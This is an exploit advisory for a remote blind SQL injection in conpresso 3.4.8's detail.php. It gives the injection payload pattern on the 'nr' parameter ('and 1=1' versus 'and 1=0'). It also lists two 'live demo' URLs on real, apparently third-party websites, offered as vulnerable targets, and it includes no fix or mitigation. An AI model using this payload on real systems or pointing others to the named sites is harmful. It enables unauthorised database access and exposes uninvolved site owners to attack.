######################################################################################################################## #conpresso 3.4.8 (detail.php) Remote Blind SQL Injection Exploit #======================================================================================================================= # #Critical Level : Dangerous # #Vendor site : http://www.conpresso.de/ # #Download : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download # #======================================================================================================================= # # #Exploit : #-------------------------------- # #www.[URL]/[PATH]/detail.php?nr=[nr] and 1=1 #www.[URL]/[PATH]/detail.php?nr=[nr] and 1=0 # #Live demo : #-------------------------------- # #http://www.maria-pawlowna.de/conpresso/Home/detail.php?nr=70+and+1=1 #http://www.muenster.org/hittorf/hittorf/Schulleben/detail.php?nr=6501+and+1=0 # #======================================================================================================================= #Discovered by : -tmh- # #Contact : tmh[at]no-trace.cc # #Greetz to : Team-Internet # # ########################################################################################################################